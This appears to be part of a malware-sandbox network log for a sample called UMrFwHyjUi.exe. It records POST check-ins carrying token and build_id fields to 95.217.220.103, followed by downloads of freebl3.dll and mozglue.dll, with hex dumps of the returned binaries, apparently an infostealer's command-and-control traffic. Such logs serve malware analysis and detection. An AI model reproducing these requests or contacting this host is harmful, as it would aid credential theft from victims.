                                                                                                                                                                                                                          Data Ascii: ------FCFBAKJDBKJJKFIDBGHCContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------FCFBAKJDBKJJKFIDBGHCContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------FCFBAKJDBKJJKFIDBGHCCont
                                                                                                                                                                                                                          2024-10-23 15:05:59 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:05:59 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:05:59 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          11192.168.2.44977295.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:00 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJE
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 437
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:06:00 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------GHJDBAKEHDHDGCAKKJJECont
                                                                                                                                                                                                                          2024-10-23 15:06:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:01 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:06:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          12192.168.2.44978295.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:02 UTC198OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:06:02 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:02 GMT
                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                          Content-Length: 685392
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Last-Modified: Wednesday, 23-Oct-2024 15:06:02 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                          2024-10-23 15:06:02 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                          2024-10-23 15:06:02 UTC16384INData Raw: 0c ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff
                                                                                                                                                                                                                          Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                                                                                                                                                          2024-10-23 15:06:03 UTC16384INData Raw: f2 c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18
                                                                                                                                                                                                                          Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
                                                                                                                                                                                                                          2024-10-23 15:06:03 UTC16384INData Raw: 8b 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01
                                                                                                                                                                                                                          Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                                                                                                                                                          2024-10-23 15:06:03 UTC16384INData Raw: ee 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac
                                                                                                                                                                                                                          Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                                                                                                                          2024-10-23 15:06:03 UTC16384INData Raw: 00 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9
                                                                                                                                                                                                                          Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                                                                                                                          2024-10-23 15:06:03 UTC16384INData Raw: c4 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00
                                                                                                                                                                                                                          Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                                                                                                                          2024-10-23 15:06:03 UTC16384INData Raw: 8b 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff
                                                                                                                                                                                                                          Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                                                                                                                                                          2024-10-23 15:06:03 UTC16384INData Raw: 77 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98
                                                                                                                                                                                                                          Data Ascii: w8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                                                                                                                                                          2024-10-23 15:06:03 UTC16384INData Raw: e8 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01
                                                                                                                                                                                                                          Data Ascii: ,0<48%8A)$


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          13192.168.2.44980895.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:06 UTC198OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:06:07 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:06 GMT
                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                          Content-Length: 608080
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Last-Modified: Wednesday, 23-Oct-2024 15:06:06 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                          2024-10-23 15:06:07 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                          2024-10-23 15:06:07 UTC16384INData Raw: 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00
                                                                                                                                                                                                                          Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
                                                                                                                                                                                                                          2024-10-23 15:06:07 UTC16384INData Raw: ff ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d
                                                                                                                                                                                                                          Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc
                                                                                                                                                                                                                          2024-10-23 15:06:07 UTC16384INData Raw: e9 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05
                                                                                                                                                                                                                          Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                                                                                                                                          2024-10-23 15:06:07 UTC16384INData Raw: 00 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0
                                                                                                                                                                                                                          Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                                                                                                                                          2024-10-23 15:06:07 UTC16384INData Raw: e9 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc
                                                                                                                                                                                                                          Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
